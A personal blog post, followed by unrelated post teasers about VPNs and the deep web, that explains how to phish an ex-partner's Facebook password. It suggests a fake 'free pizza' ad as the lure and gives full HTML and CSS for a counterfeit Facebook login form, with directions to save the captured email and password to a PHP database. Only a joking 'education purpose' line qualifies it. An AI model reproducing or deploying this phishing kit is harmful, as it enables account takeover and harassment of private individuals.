Skip to main content

Lets hack the freaking facebook

Hack i mean peak ....but i can still get yours ex username and password .... what else you need ?
for now ?


Hackers way in .. thats how facebook gets most of the employees


to make this work lets make a Trojan add like free pizza


and your ex clicked it


and then it redirected to a custom form just like a facebook login form (login with facebook)


and your idiot ex fill up the form boom you got her user name and password win win


let me put the code that you could you to make that login page and store the data onto a database


hope you guys know how to deal with php and its data base connection a bit...


soo
im gonna put the form code here and you can use a data base to connect it and use the post data



your convince and my ease

<html>

<head>
<style>
.login-form-wrap {
  background: #5170ad;
  background: -moz-radial-gradient(center, ellipse cover, #5170ad 0%, #355493 100%);
  background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, #5170ad), color-stop(100%, #355493));
  background: -webkit-radial-gradient(center, ellipse cover, #5170ad 0%, #355493 100%);
  background: -o-radial-gradient(center, ellipse cover, #5170ad 0%, #355493 100%);
  background: -ms-radial-gradient(center, ellipse cover, #5170ad 0%, #355493 100%);
  background: radial-gradient(ellipse at center, #5170ad 0%, #355493 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#5170ad', endColorstr='#355493',GradientType=1 );
  border: 1px solid #2d416d;
  box-shadow: 0 1px #5670a4 inset, 0 0 10px 5px rgba(0, 0, 0, 0.1);
  border-radius: 5px;
  position: relative;
  width: 360px;
  height: 380px;
  margin: 10px auto 20px auto;
  padding: 50px 30px 0 30px;
  text-align: center;
}
.login-form-wrap:before {
  background: url( );
  display: block;
  content: '';
  width: 58px;
  height: 19px;
  top: 10px;
  left: 10px;
  position: absolute;
}
.login-form-wrap > h1 {
  margin: 0 0 50px 0;
  padding: 0;
  font-size: 26px;
  color: #fff;
}
.login-form-wrap > h5 {
  margin-top: 40px;
}
.login-form-wrap > h5 > a {
  font-size: 14px;
  color: #fff;
  text-decoration: none;
  font-weight: 400;
}

.login-form input[type="email"], .login-form input[type="password"] {
  width: 100%;
  border: 1px solid #314d89;
  outline: none;
  padding: 12px 20px;
  color: #afafaf;
  font-weight: 400;
  font-family: 'Lato', sans-serif;
  cursor: pointer;
}
.login-form input[type="email"] {
  border-bottom: none;
  border-radius: 4px 4px 0 0;
  padding-bottom: 13px;
  box-shadow: 0 -1px 0 #e0e0e0 inset, 0 1px 2px rgba(0, 0, 0, 0.23) inset;
}
.login-form input[type="password"] {
  border-top: none;
  border-radius: 0 0 4px 4px;
  box-shadow: 0 -1px 2px rgba(0, 0, 0, 0.23) inset, 0 1px 2px rgba(255, 255, 255, 0.1);
}
.login-form input[type="submit"] {
  font-family: 'Lato', sans-serif;
  font-weight: 400;
  background: #e0e0e0;
  background: -moz-linear-gradient(top, #e0e0e0 0%, #cecece 100%);
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e0e0e0), color-stop(100%, #cecece));
  background: -webkit-linear-gradient(top, #e0e0e0 0%, #cecece 100%);
  background: -o-linear-gradient(top, #e0e0e0 0%, #cecece 100%);
  background: -ms-linear-gradient(top, #e0e0e0 0%, #cecece 100%);
  background: linear-gradient(to bottom, #e0e0e0 0%, #cecece 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#e0e0e0', endColorstr='#cecece',GradientType=0 );
  display: block;
  margin: 20px auto 0 auto;
  width: 100%;
  border: none;
  border-radius: 3px;
  padding: 8px;
  font-size: 17px;
  color: #636363;
  text-shadow: 0 1px 0 rgba(255, 255, 255, 0.45);
  font-weight: 700;
  box-shadow: 0 1px 3px 1px rgba(0, 0, 0, 0.17), 0 1px 0 rgba(255, 255, 255, 0.36) inset;
}
.login-form input[type="submit"]:hover {
  background: #DDD;
}
.login-form input[type="submit"]:active {
  padding-top: 9px;
  padding-bottom: 7px;
  background: #C9C9C9;
}
</style>
</head>
<body>
<section class="login-form-wrap">
        <h1>Facebook</h1>
        <form class="login-form" action="POST" action="#">
            <label>
                <input type="email" name="email" required placeholder="Email">
            </label>
            <label>
                <input type="password" name="password" required placeholder="Password">
            </label>
            <input type="submit" value="Login">
        </form>
        <h5><a href="#">Forgot password</a></h5>
    </section>
</body>
</html>
 

education purpose and sort of warning to my brilliant pal hihihi


 

Comments

Popular posts from this blog

Data Type vs Return Type

Legend Of The Returned One Aha that is a question right ? Aren't they are the same thing ? At some point I honestly thought the same but actually it's not data type is not return type and return type is not data type . E ven if you are using Java php c++ or any other languages During a program we have to initialize or declare some variable for that we need to specify what data are we gonna use on that particular variable location . Then what is return type ? We seen that when we a create  or providing the definition to a function we have to specify a return type to indicate what data type is return from the function to the main function to be more specific it's know as return data type. For example void cat ( ) " the function cat is not returning any data " or int cat( ) " means cat is returning some value to the main function" Ever seen any variable as a data type of return? I haven't and please let me know...

VPN

What Is VPN ? How Dose It Work? What It Does For You ? VPN/ Virtual private Network are used to day for many reasons but we can throw all of those to a general bin .That is securely connecting an individual user to a larger network .in the older days VPN are used by cooperate employees to access their office by remote when they needed to access sensitive informations in a secured way .But in time vpn technology is available to regular internet users it helps people from all around the world to connect in  a secured way .VPN allows your connection to be encrypted and secure to become a anonymous surfing user in the web and also keep you traffic data safe from hackers mean government or may be your over concerned significant others . VPN also get you to access blocked things because of geo location some on-line things such as videos ,music file,news,search engines and so on are unavailable in some country/or places by using VPN make the user looks like a lock ...

All the way to deep net from surface web !!

SURFACE WEB DEEP WEB & DARK NET Do you ever wonder sitting in front of Google and thinking i almost know everything about anything of course if you know what you wanna know about wujajaja/jajaja(this is how people laugh in espanol) why did i laugh because i have to break it up to you  .                          The waste majority of thing in the internet is just a mask to hide the real thing out there . so what is this deep net by definition its quit simple "Those are the stuff of the internet you cant bring up with Google or bing and may be even duckduckgo" So "this are the places out there on internet you can't get in with out the actual URL(universe resource locator) and the permission to get in" Just think for a moment how many facebook pages ,how may company's with sensitive data  or some creepy privet youtube videos the other things that god know what to do with those and which is ...